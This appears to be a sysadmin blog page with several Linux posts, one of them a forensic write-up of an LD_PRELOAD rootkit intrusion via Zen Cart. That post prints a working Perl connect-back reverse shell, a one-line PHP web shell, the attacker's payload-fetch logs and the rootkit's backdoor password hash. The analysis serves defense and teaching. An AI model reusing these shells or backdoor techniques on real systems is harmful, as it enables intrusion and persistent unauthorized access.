Bind9 statistics-channels munin plugin

Bind9, since version 9.5, offers an experimental embedded web server which can provide statistics abound Bind through HTTP. Upon enabling, one can access this web server and get an XML response full with various statistics.

Enabling the feature is quite easy. One just needs to add some lines like the following inside Bind’s configuration file:

statistics-channels {
          inet 127.0.0.1 port 8053 allow {127.0.0.1;};
};

Restart Bind and try connecting to the statistics-channel. For example through curl:

$ curl http://127.0.0.1:8053
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="/bind9.xsl"?>
<isc version="1.0">
  <bind>
    <statistics version="2.2">
      <views>
        <view>
          <name>_default</name>
          <zones>
            <zone>
              <name>0.in-addr.arpa/IN</name>
              <rdataclass>IN</rdataclass>
              <serial>1</serial>
            </zone>
            <zone>
              <name>10.in-addr.arpa/IN</name>
              <rdataclass>IN</rdataclass>
              <serial>1</serial>
            </zone>
...
...
...
...
         <TotalUse>810834110</TotalUse>
          <InUse>327646360</InUse>
          <BlockSize>740556800</BlockSize>
          <ContextSize>9954232</ContextSize>
          <Lost>0</Lost>
        </summary>
      </memory>
    </statistics>
  </bind>
</isc>

The output will be quite big, for example the current output from a busy recursive resolver is around 2.5Mb.

People usually use munin to monitor bind through 2 different ways. The first, usually applied to servers that are not very busy, for example servers with less than 100queries/sec, is to parse the output of the query log. Then a munin plugin that comes with the default munin installation and is called bind9 can parse the query log and create some graphs. The second way for a bit busier servers is to have query log disabled and monitor bind is through the output of the rndc stats command. A munin plugin that also comes with the default munin package and is called bind9_rndc can parse the created named.stats output file and create some nice graphs. To configure either of the two ways one can take a look at this informational wiki: http://wiki.debuntu.org/wiki/Munin/Bind9_Plugin

A third way is to have a new munin plugin get the XML output from the statistics-channel described above and create some even fancier and richer graphs. Luckily a guy called Andrew Duquette has created such a perl plugin for munin. You need to exercise your google skills to find it though, (that is if you don’t cheat searching with his name as a search term!) I took that plugin, made some changes to it and uploaded it to github. The plugin is called bind9_statchannel and you can find it in my github munin-plugins repo.

The changes I made were the following:

  • Use STACK instead of just AREA for some graphs
  • Add warning and critical levels for type ANY queries (to warn for DDoS through such queries)
  • Raise timeout to 300 seconds
  • Add sorting to stacked graphs so they are a bit more readable/comparable

The plugin creates the following type of graphs:

  • Cache DB RRsets for various views (or the _default if you don’t have any others)
  • Memory Context “In Use”
  • Memory Usage Summary
  • Queries In
  • Queries Out
  • Resolver Statistics for various views (or the _default if you don’t have any others)
  • Server Statistics
  • Socket I/O Statistics
  • Tasks

As you can see it can give many more details compared to the other bind9 munin plugins. It’s also the only bind9 munin plugin that can tell you how many incoming vs outgoing queries there are, as well as the only one that can tell you how many queries you have over IPv4 vs IPv6.

To use it on Debian you need to at least install the following two perl packages: libxml-simple-perl, liblwp-useragent-determined-perl

Here are some sample graphs from the bind9_statchannel plugin:

If you have any bug fixes, code changes, etc please don’t hesitate to fork and open a pull request on github.

Download: bind9_statchannel

itop – Interrupts ‘top-like’ utility for Linux

On a 24-core Linux machine I wanted to monitor interrupts/sec. The reason is quite complicated, let’s say that there are more than 100.000 interrupts/sec and I want to monitor who needs what.

First I installed Debian’s itop package. It didn’t work at all on the 24-core machine, just showed an empty display. Then I tried a perl itop implementation I found online at a redhat server, let’s call it redhat’s itop. That still didn’t work well. Lot’s of parsing issues and it certainly wasn’t ready to deal with 24-cores.

So I tweaked it a bit and made it ready for a 24-core server. You can find it online at my github repository: kargig’s itop

Since displaying 24 columns of continuously changing numbers doesn’t fit all screens, I added some command line options to the tool.
By default it shows all interrupts/sec per CPU if the number of CPU cores is not higher than 8. If it’s higher than 8 it just displays the total (adding all per core numbers) interrupts/sec.
Command line flag ‘-a’ forces displaying of ALL cores and command line flag ‘-t’ forces displaying just the TOTAL number of interrupts/sec.

So if you too need to monitor your server’s interrupts/sec, give my itop a try. If you want to make changes, just fork it on github. Simple as that…I promise to merge any interesting changes/pull requests you people send me!

oh and here’s a screenshot of ‘itop -t’

There’s a rootkit in the closet!

Part 1: Finding the rootkit

It’s monday morning and I am for coffee in downtown Thessaloniki, a partner calls:
– On machine XXX mysqld is not starting since Saturday.
– Can I drink my coffee and come over later to check it ? Is it critical ?
– Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It’s a debian oldstable (etch) that runs apache2 with xoops CMS + zencart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mailserver…

I log in as root, I do a ps ax and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can’t see it running on ps so I try starting it via the init.d script. Nothing…it hangs while trying to get it started. I suspect a failing disk so I use tune2fs -C 50 /dev/hda1 to force an e2fck on boot and I reboot the machine. The box starts booting, it checks the fs, no errors found, it continues and hangs at starting mysqld. I break out of the process and am back at login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda, all clear, no errors found. Then I try to start mysqld manually, it looks like it starts but when I try to connect to it via a mysql client I get no response. I try to move /var/lib/mysql/ files to another location and to re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. Apt-get process tries to stop mysqld before it replaces it with the older version and it hangs, I try to break out of the process but it’s impossible…after a few killall -9 mysqld_safe;killall -9 mysql; killall -9 mysqladmin it finally moves on but when it tries to start the downgraded mysqld version it hangs once again. That’s totally weird…

I try to ldd /usr/sbin/mysqld and I notice a very strange library named /lib/ld-linuxv.so.1 in the output. I had never heard of that library name before so I google. Nothing comes up. I check on another debian etch box I have for the output of ldd /usr/sbin/mysqld and no library /lib/ld-linuxv.so.1 comes up. I am definitely watching something that it shouldn’t be there. And that’s a rootkit!

I ask some friends online but nobody has ever faced that library rootkit before. I try to find that file on the box but it’s nowhere to be seen inside /lib/…the rootkit hides itself pretty well. I can’t see it with ls /lib or echo /lib/*. The rootkit has probably patched the kernel functions that allow me to see it. Strangely though I was able to see it with ldd (more about the technical stuff on the second half of the post). I try to check on some other executables in /sbin with a for i in /usr/sbin/*;do ldd $i; done, all of them appear to have /lib/ld-linuxv.so.1 as a library dependency. I try to reboot the box with another kernel than the one it’s currently using but I get strange errors that it can’t even find the hard disk.

I try to downgrade the “working” kernel in an attempt of booting the box cleanly without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced of course. When apt-get procedure calls mkinitramfs in order to create the initramfs image I notice that there are errors saying that it can’t delete /tmp/mkinitramfs_UVWXYZ/lib/ld-linuxv.so.1 file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine at the time and that I should first get an image of the disk before I fiddle any more with it. So I shut the box down. I set up a new box with most of the services that should be running (mail + dns), so I had the option to check on the disk with the rootkit on my own time.

Part 2: Technical analysis
I. First look at the ld-linuxv.so.1 library

A couple of days later I put the disk to my box and made an image of each partition using dd:
dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:
mount -o loop /mnt/image/part1 /mnt/part1

A simple ls of /mnt/part1/lib/ revealed that ld-linuxv.so.1 was there. I run strings to it:
# strings /lib/ld-linuxv.so.1
__gmon_start__
_init
_fini
__cxa_finalize
_Jv_RegisterClasses
execve
dlsym
fopen
fprintf
fclose
puts
system
crypt
strdup
readdir64
strstr
__xstat64
__errno_location
__lxstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
vasprintf
getspnam_r
getspnam
getpwnam
pam_authenticate
inssh
gotpass
__libc_start_main
logit
setuid
setgid
seteuid
setegid
read
fwrite
accept
htons
doshell
doconnect
fork
dup2
stdout
fflush
stdin
fscanf
sleep
exit
waitpid
socket
libdl.so.2
libc.so.6
_edata
__bss_start
_end
GLIBC_2.0
GLIBC_2.1.3
GLIBC_2.1
root
@^_]
`^_]
ld.so.preload
ld-linuxv.so.1
_so_cache
execve
/var/opt/_so_cache/ld
%s:%s
Welcome master
crypt
readdir64
__xstat64
__lxstat64
opendir
login
pututline
open64
lastlog
pam_open_session
pam_close_session
syslog
getspnam_r
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
getspnam
getpwnam
root
/dev/null
normal
pam_authenticate
pam_get_item
Password:
__libc_start_main
/var/opt/_so_cache/lc
local
/usr/sbin/sshd
/bin/sh
read
write
accept
/usr/sbin/crond
HISTFILE=/dev/null
%99s
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
/bin/sh

As one can easily see there’s some sort of password hash inside and references to /usr/sbin/sshd, /bin/sh and setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted to the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) we thought that we had to do with a kernel rootkit. However, after carefully studying the disassembled dead listing of ld-linuxv.so.1, it became clear that it was a shared library based rootkit. Specifically, the intruder created the /etc/ld.so.preload file on the system with just one entry; the path of where he saved the ld-linuxv.so.1 shared library, namely /lib/ld-linuxv.so.1. This has the effect of preloading ld-linuxv.so.1 every single time a dynamically linked executable is run by a user. Using the well-known technique of dlsym(RTLD_NEXT, symbol), in which the run-time address of the symbol after the current library is returned to allow the creation of wrappers, the ld-linuxv.so.1 shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks and brief explanations of what some of them do:
crypt
readdir64
__xstat64
__l xstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
getspnam_r
getspnam
getpwnam
pam_authenticate
pam_get_item
__libc_start_main
read
write
accept

The hijacked accept() function sends a reverse, i.e. outgoing, shell to the IP address that initiated the incoming connection at port 80 only if the incoming IP address is a specific one. Afterwards it calls the original accept() system call. The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value (“$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0”). The hijacked read() and write() functions of the shared library wrap the corresponding system calls and if the current process is ssh (client or daemon), their buffers are appended to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the logs of the server. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn’t provide any outcome at first sight, nothing really striking out, but when I opened /mnt/part1/var/log/apache2/error.log.1 I faced these entries at the bottom:

–01:05:38– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
–01:05:51– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 18.61 MB/s

01:05:51 (18.61 MB/s) – `foobar.ext’ saved [695/695]

–01:17:14– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
–01:17:26– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 25.30 MB/s

01:17:26 (25.30 MB/s) – `foobar.ext’ saved [695/695]

So this was the entrance point. Someone got through a web app to the box and was able to run code.
I downloaded “foobar.ext” from the same url and it was a perl script.

#!/usr/bin/perl
# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source
# Code

use Socket;

print “[*] Dumping Arguments\n”;

$host = “A.B.C.D”;
$port = XYZ;

if ($ARGV[1]) {
$port = $ARGV[1];
}
print “[*] Connecting…\n”; $proto = getprotobyname(‘tcp’) || die(“[-] Unknown Protocol\n”);

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (“[-] Socket Error\n”);

my $target = inet_aton($host);

if (!connect(SERVER, pack “SnA4x8”, 2, $port, $target)) {
die(“[-] Unable to Connect\n”);
}
print “[*] Spawning Shell\n”;

if (!fork( )) {
open(STDIN,”>&SERVER”);
open(STDOUT,”>&SERVER”);
open(STDERR,”>&SERVER”);
exec {‘/bin/sh’} ‘-bash’ . “\0” x 4;
exit(0);
}

Since I got the time when foobar.ext was downloaded I looked again at the apache2 access.log to see what was going on at the time.
Here are some entries:

A.B.C.D – – [15/Aug/2009:01:05:33 +0300] “GET http://www.domain.com/admin/ HTTP/1.1” 302 – “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:34 +0300] “POST http://www.domain.com/admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1” 200 303 “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:34 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 131 “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:38 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 – “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:47 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 52 “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:50 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 – “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:51 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 59 “-” “Mozilla Firefox”

The second entry, with the POST looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This code allows running commands using the account of the user running the apache2 server.

Part 3: Conclusion and food for thought
To conclude on what happened:
1) The attacker used the zencart vulnerability to create the imagedisplay.php file.
2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.
3) Using the imagedisplay.php file he was able to run the server run foobar.ext which is a reverse shell. He could now connect to the machine.
4) Using some local exploit(s) he was probably able to become root.
5) Since he was root he uploaded/compiled ld-linuxv.so.1 and he created /etc/ld.so.preload. Now every executable would first load this “trojaned” library which allows him backdoor access to the box and is hidding from the system. So there is his rootkit 🙂

Fortunately the rootkit had problems and if /var/opt/_so_cache/ directory was not manually created it couldn’t write the lc and ld files inside it. If you created the _so_cache dir then it started logging.

If there are any more discoveries about the rootkit they will be posted in a new post. If someone else wants to analyze the rootkit I would be more than happy if he/she put a link to the analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the ld-linuxv.so.1 library and the perl script foobar.ext (Use at your own risk. Attacker’s host/ip have been removed from the perl script):linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs

Using halevt to automount media and make them appear on ROX desktop

With the recent addition of halevt in Gentoo’s portage it is now relatively easy to automatically mount media like USB sticks and CD/DVD discs on /media.

What I wanted to do was to emulate my previous set of configs and scripts that ivman used to create icons of automatically mounted media on ROX desktop (called pinboard). I am using ROX pinboard on top of my favorite window manager, fluxbox.

The idea is that halevt is started by the fluxbox startup config file and when a new device is attached to the computer, halevt config calls a script that creates an icon on the ROX pinboard using ROX rpc. When a device needs to be removed ROX pinboard is configured to call a special eject command that checks for a couple of things before unmounting the device and calling the script to remove the icon from ROX pinboard.
Apart from automatically mounting/unmounting of devices I have also added a nice option in the halevt config to unmount and eject the CD/DVD drive when the eject button on the device is used and of course when the CD/DVD is not in use. That emulates a bit the windows behavior that so many users have gotten used to.

Since the script used by halevt involves a lot of file reading/writing and parsing I thought it would be wise to convert my old rox.panelput bash script to perl. And I was correct, the speed difference, even for such simple tasks is more than noticeable.

The installation process. Please take notice of the user executing the commands, $ is for normal user, # is for root:
0) create /usr/local/bin/ path and put it in your shell’s PATH
# mkdir /usr/local/bin
$ echo "export PATH=$PATH:/usr/local/bin/" >> ~/.bashrc

1) install halevt
# echo "sys-apps/halevt ~x86" >> /etc/portage/package.keywords
# emerge halevt

(more…)

migrating from fluxbox 1.0.0 to 1.1.X

I recently upgraded from a stable fluxbox release (1.0.0) to a development one (1.1.1), on gentoo x11-wm/fluxbox-1.1.1-r1, ~x86 branch . There have been some interesting changes. If you also upgrade you might find though that your “tabs” are not working.
Recent fluxbox versions (1.1.0+) have dumped the old “groups” file which used to contain applications that could be grouped in tabs. Now the grouped applications must be declared inside the “apps” file. The syntax is rather simple, if you want an application to have tab support just add a “[group]” line before it. For example if you had a groups file that combined urxvt, xterm and aterm tabs:
% cat ~/.fluxbox/groups
urxvt xterm aterm

The new proper syntax in apps file would be:
%cat ~/.fluxbox/apps
[group]
[app] (name=urxvt)
[app] (name=xterm)
[app] (name=aterm)
[end]

I wrote a perl script that can convert your old groups file to the new group format for apps file. fbox_groups_to_apps.pl

Bugs reports,fixes are more than welcome…

iftraffic.pl: perl script to measure in/out traffic in realtime

During some QoS tests on Linux I needed to measure the traffic of the system in realtime without being able to compile any new software on it. The system had already perl installed so I googled to find a script that could monitor in/out traffic of an interface. The first script I found was this: http://perlmonks.org/?node_id=635792

While it’s actually doing what it says, it only runs just once. I wanted the script to run for a period of time. So I changed it a bit.
Here’s the outcome:
#!/usr/bin/perl
my $dev=$ARGV[0];
sub get_measures {
my $data = `cat /proc/net/dev | grep "$dev" | head -n1`;
$data =~ /$dev\:(\d+)\D+\d+\D+\d+\D+\d+\D+\d+\D+\d+\D+\d+\D+\d+\D+(\d+)\D+/;
my $recv = int($1/1024);
my $sent= int($2/1024);
return ($recv,$sent);
}
my @m1 = get_measures;
while(1) {
sleep 1;
my @m2 = get_measures;
my @rates = ($m2[0] - $m1[0], $m2[1]-$m1[1]);
foreach ('received' , ' transmit') {
printf "$_ rate:%sKB",shift @rates;
}
print "\n";
@m1=@m2;
}

I’ve changed it so that it’s:
a) running continuously until someone presses ctrl+c to stop it,
b) parsing the /proc/net/dev output instead of the ifconfig output. I think this is more efficient/fast than parsing the ifconfig output.

Sample output:

$iftraffic.pl eth0
received rate:1564KB transmit rate:71KB
received rate:1316KB transmit rate:44KB
received rate:1415KB transmit rate:48KB
received rate:1579KB transmit rate:76KB

I am sure that someone with more insight into perl than me can make it even more efficient.

You can also download a version with comments that I made so that one can make the script run for X number of repetitions instead of running until someone stops it.
Download: iftraffic.pl

commandlinefu.com random entry parser

I’ve written a small perl script to parse random entries from the extremely usefull commandlinefu.com website. Quoting from their site:

Command-Line-Fu is the place to record those command-line gems that you return to again and again.

The script code is very “clean”. I can almost say that it’s written in a very python-ish way.
Sample output:%./cfu.pl
CMD: for (( i = 0; i < 100; i++ )); do echo "$i"; done
URL=http://www.commandlinefu.com/commands/view/735/perform-a-c-style-loop-in-bash. Title=Perform a C-style loop in Bash.
Description: Print 0 through 99, each on a separate line.
%./cfu.pl
CMD: rsync -av -e ssh user@host:/path/to/file.txt .
URL=http://www.commandlinefu.com/commands/view/20/synchronise-a-file-from-a-remote-server Title=Synchronise a file from a remote server
Description: You will be prompted for a password unless you have your public keys set-up.

You can get it from here: commandlinefu.com random entry parser perl script

As far as I’ve tested, it works out of the box on default perl installations of Debian, Gentoo and Mac OS X.